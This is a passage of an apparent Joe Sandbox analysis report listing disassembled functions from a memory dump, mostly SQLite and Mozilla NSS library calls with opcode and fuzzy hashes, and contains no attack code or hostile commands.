Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: 2d8d251e21264c8d891d4cbb6022f59b3067c6f0c39645487e3213ff53c38cbf
Instruction ID: 2f70ca53b74c21d0a69118037529cf340f03c3a02d24868149d1bf38dcc57b48
Opcode Fuzzy Hash: 2d8d251e21264c8d891d4cbb6022f59b3067c6f0c39645487e3213ff53c38cbf
Instruction Fuzzy Hash: A771CDB670520ADBEB00CE15CD80B9A77B6BF48308F244529FD099BB81D731E861CBE5

Function 6CE72D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6CE72D69

Strings

winUnmapfile1, xrefs: 6CE72F55
winSeekFile, xrefs: 6CE72E9C
winUnmapfile2, xrefs: 6CE72F7F
winTruncate2, xrefs: 6CE72EF8
winTruncate1, xrefs: 6CE72EBE

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 8888d316cc5eb5a2835cadb73230267aff75bb8f34ce7b2f31e928defca94d9d
Instruction ID: c7efd222a7388dc74be93fb818df60e4320ac6c8108b0ebad4ebf7900be6779b
Opcode Fuzzy Hash: 8888d316cc5eb5a2835cadb73230267aff75bb8f34ce7b2f31e928defca94d9d
Instruction Fuzzy Hash: E161A275B00205DFDB54CF64DC84B6A7BB2FB5A314F20852DEA159B780DB31AD06CBA1

Function 6CEADEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CEADF37
EnterCriticalSection.KERNEL32(?), ref: 6CEADF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEADF96
PR_SetError.NSS3(00000000,00000000), ref: 6CEAE02B
PR_Unlock.NSS3(?), ref: 6CEAE07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CEAE090
PR_Unlock.NSS3(?), ref: 6CEAE0AF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 00b357e22bedc893a6c5d7462d251cd5d43c7e3fc2ff1ff6e5b015968c4e9089
Instruction ID: e70bce6c228d4e6e524b26826e0d6cf3faafbea5dd4d4c217510c43e5458573c
Opcode Fuzzy Hash: 00b357e22bedc893a6c5d7462d251cd5d43c7e3fc2ff1ff6e5b015968c4e9089
Instruction Fuzzy Hash: 7951D238A00A008FEB209FA5D885B5773F5FF49308F304528E8564BB91D735E95ACBD2

Function 6CEABCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CEABD1E

Part of subcall function 6CE82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CE82F0A
Part of subcall function 6CE82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CE82F1D

Part of subcall function 6CEC57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CE8B41E,00000000,00000000,?,00000000,?,6CE8B41E,00000000,00000000,00000001,?), ref: 6CEC57E0
Part of subcall function 6CEC57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CEC5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CEABD8C

Part of subcall function 6CEDFAB0: free.MOZGLUE(?,-00000001,?,?,6CE7F673,00000000,00000000), ref: 6CEDFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6CEABD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CEABDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEABE3A

Part of subcall function 6CE83E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CE83EC2
Part of subcall function 6CE83E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CE83ED6
Part of subcall function 6CE83E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE83EEE
Part of subcall function 6CE83E60: PR_CallOnce.NSS3(6CFE2AA4,6CEE12D0), ref: 6CE83F02
Part of subcall function 6CE83E60: PL_FreeArenaPool.NSS3 ref: 6CE83F14
Part of subcall function 6CE83E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CE83F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CEABE52

Part of subcall function 6CE82E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CE82CDA,?,00000000), ref: 6CE82E1E
Part of subcall function 6CE82E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CE82E33
Part of subcall function 6CE82E00: TlsGetValue.KERNEL32 ref: 6CE82E4E
Part of subcall function 6CE82E00: EnterCriticalSection.KERNEL32(?), ref: 6CE82E5E
Part of subcall function 6CE82E00: PL_HashTableLookup.NSS3(?), ref: 6CE82E71
Part of subcall function 6CE82E00: PL_HashTableRemove.NSS3(?), ref: 6CE82E84
Part of subcall function 6CE82E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CE82E96
Part of subcall function 6CE82E00: PR_Unlock.NSS3 ref: 6CE82EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEABE61

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: faf2f57d6e8db286a893594ff0bcad974206572d3bd4d4ab1830cdb2179e76fe
Instruction ID: 5e7d92f37978a429b6c5139f958d26c7b44a6794e34a86e05c67d88900ea23f7
Opcode Fuzzy Hash: faf2f57d6e8db286a893594ff0bcad974206572d3bd4d4ab1830cdb2179e76fe
Instruction Fuzzy Hash: 0141F2B6E01214AFC710CF68DC80B6A77F4EF49718F258168F9099B712E735E906CB92

Function 6CECAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CECAB3E,?,?,?), ref: 6CECAC35

Part of subcall function 6CEACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CEACF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CECAB3E,?,?,?), ref: 6CECAC55

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CECAB3E,?,?), ref: 6CECAC70

Part of subcall function 6CEAE300: TlsGetValue.KERNEL32 ref: 6CEAE33C
Part of subcall function 6CEAE300: EnterCriticalSection.KERNEL32(?), ref: 6CEAE350
Part of subcall function 6CEAE300: PR_Unlock.NSS3(?), ref: 6CEAE5BC
Part of subcall function 6CEAE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CEAE5CA
Part of subcall function 6CEAE300: TlsGetValue.KERNEL32 ref: 6CEAE5F2
Part of subcall function 6CEAE300: EnterCriticalSection.KERNEL32(?), ref: 6CEAE606
Part of subcall function 6CEAE300: PORT_Alloc_Util.NSS3(?), ref: 6CEAE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CECAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CECAB3E), ref: 6CECACD7
PORT_Alloc_Util.NSS3(?), ref: 6CECAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CECAD2B

Part of subcall function 6CEAF360: TlsGetValue.KERNEL32(00000000,?,6CECA904,?), ref: 6CEAF38B
Part of subcall function 6CEAF360: EnterCriticalSection.KERNEL32(?,?,?,6CECA904,?), ref: 6CEAF3A0
Part of subcall function 6CEAF360: PR_Unlock.NSS3(?,?,?,?,6CECA904,?), ref: 6CEAF3D3

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 7f892ffc2d0d9ee171969ff41a7d68694daa8f2afeb80ce09902108090c4f46b
Instruction ID: 0d2c48cb3fbdf8193549e3aa90734e15081625f30eb23864feb99c4452ff16e3
Opcode Fuzzy Hash: 7f892ffc2d0d9ee171969ff41a7d68694daa8f2afeb80ce09902108090c4f46b
Instruction Fuzzy Hash: 5D3129B1F406055FEB008F69CD409EF7B76AF8431CB288128E825AB740EB31DD1687A2

Function 6CEA8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CEA8C7C

Part of subcall function 6CF49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DC6
Part of subcall function 6CF49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF90A27), ref: 6CF49DD1
Part of subcall function 6CF49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF49DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CEA8CB0
TlsGetValue.KERNEL32 ref: 6CEA8CD1
EnterCriticalSection.KERNEL32(?), ref: 6CEA8CE5
PR_Unlock.NSS3(?), ref: 6CEA8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CEA8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEA8D93

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 6648d5fe716f4f13583d56c58153b7633f1d3e1fd98965c595dd6cf2081c8018
Instruction ID: 809cbbd65f9d08438be550c5d79efb9e04de0226c245291245e5fe45607f4c0d
Opcode Fuzzy Hash: 6648d5fe716f4f13583d56c58153b7633f1d3e1fd98965c595dd6cf2081c8018
Instruction Fuzzy Hash: 9A314C71E01601AFEB20AFA8DC4479AB778BF45318F34013AEA156BB50D770A966C7D1

Function 6CEE9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CEE9C5B), ref: 6CEE9D82

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CEE9C5B), ref: 6CEE9DA9

Part of subcall function 6CEE1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE136A
Part of subcall function 6CEE1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE137E
Part of subcall function 6CEE1340: PL_ArenaGrow.NSS3(?,6CE7F599,?,00000000,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?), ref: 6CEE13CF
Part of subcall function 6CEE1340: PR_Unlock.NSS3(?,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CEE9C5B), ref: 6CEE9DCE

Part of subcall function 6CEE1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000,?,6CE7F599,?,00000000), ref: 6CEE13F0
Part of subcall function 6CEE1340: PL_ArenaGrow.NSS3(?,6CE7F599,?,?,?,00000000,00000000,?,6CE8895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CEE1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CEE9C5B), ref: 6CEE9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CEE9C5B), ref: 6CEE9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CEE9C5B), ref: 6CEE9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CEE9C5B), ref: 6CEE9E91

Part of subcall function 6CF2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF2C2BF

Part of subcall function 6CEE1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CEDFAAB,00000000), ref: 6CEE157E
Part of subcall function 6CEE1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CEDFAAB,00000000), ref: 6CEE1592
Part of subcall function 6CEE1560: memset.VCRUNTIME140(?,00000000,?), ref: 6CEE1600
Part of subcall function 6CEE1560: PL_ArenaRelease.NSS3(?,?), ref: 6CEE1620
Part of subcall function 6CEE1560: PR_Unlock.NSS3(?), ref: 6CEE1639

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 6d8caaabf78de493b9127e85680b32fa11fb99df5f5616f0d8ae790c573c33f1
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 2C417EB4601606AFE7409F55D840B96BBF1FF49398F248128D9184BFA1EB72E834CB90

Function 6CEADDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CEADDEC

Part of subcall function 6CEE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEE08B4

PK11_DigestBegin.NSS3(00000000), ref: 6CEADE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CEADE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6CEADE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CEADEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CEADEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEADECC

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 863893a56213ba550d4fb13314dddfd54cf438b6ae74e6b925ece8d77db07cdb
Instruction ID: 577596e5f1cf2afc7d62898c30742a1cfe1c179b978423e1eaea2b99f9d279ed
Opcode Fuzzy Hash: 863893a56213ba550d4fb13314dddfd54cf438b6ae74e6b925ece8d77db07cdb
Instruction Fuzzy Hash: F931B7B6E002146FDB00AFA4AC41BBB76B89F5570CF254129ED09AB741FB31DE15C6E2

Function 6CE87E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CE87E48

Part of subcall function 6CEE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE887ED,00000800,6CE7EF74,00000000), ref: 6CEE1000
Part of subcall function 6CEE0FF0: PR_NewLock.NSS3(?,00000800,6CE7EF74,00000000), ref: 6CEE1016
Part of subcall function 6CEE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE887ED,00000008,?,00000800,6CE7EF74,00000000), ref: 6CEE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CE87E5B

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CE87E7B

Part of subcall function 6CEDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CED8D2D,?,00000000,?), ref: 6CEDFB85
Part of subcall function 6CEDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEDFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CFA925C,?), ref: 6CE87E92

Part of subcall function 6CEDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CFB18D0,?), ref: 6CEDB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CE87EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CE87ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CE87EFA

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: 928666c95e61ca54a2ae7fbf7331ff7188f04830b3e1a610c469faabe8c78819
Instruction ID: 39bcf6f233ee1f3000ad8c5fd132d6b6bf0fc42f532e76296c292a05f259b610
Opcode Fuzzy Hash: 928666c95e61ca54a2ae7fbf7331ff7188f04830b3e1a610c469faabe8c78819
Instruction Fuzzy Hash: 093170B2F022119BEB109B699C41B5B77B8AF5565CF294828EC59EBB41F730EC04C7B0

Function 6CEDDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CEDD9E4,00000000), ref: 6CEDDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CEDD9E4,00000000), ref: 6CEDDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CEDD9E4,00000000), ref: 6CEDDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEDDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CEDDCAD

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: a68fa5b630d27b1437d44b5000e21ad7ba2797ca4400f33920b776f5393d0188
Instruction ID: 4b9d796700a54d2ddfcb6cd08124502498d0462eeb7f11edb62cec892004a4ad
Opcode Fuzzy Hash: a68fa5b630d27b1437d44b5000e21ad7ba2797ca4400f33920b776f5393d0188
Instruction Fuzzy Hash: E23152B9A012009FD750CF59E884B56B7F8AF45358F254429E948CBB01D771FA45CFA1

Function 6CEA2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CE9E728,?,00000038,?,?,00000000), ref: 6CEA2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEA2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CEA2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CEA2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CEA2E9E
PR_Unlock.NSS3(?), ref: 6CEA2EAB
PR_Unlock.NSS3(?), ref: 6CEA2F0D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 65ddf9f3e914946a99e1df82adcc6182f1b0281be08cf8c3ca4ebd1f336fd1de
Instruction ID: ff6b084145ee331d2bb7b1872ee2788873becf95242071b414618ea9d27ab481
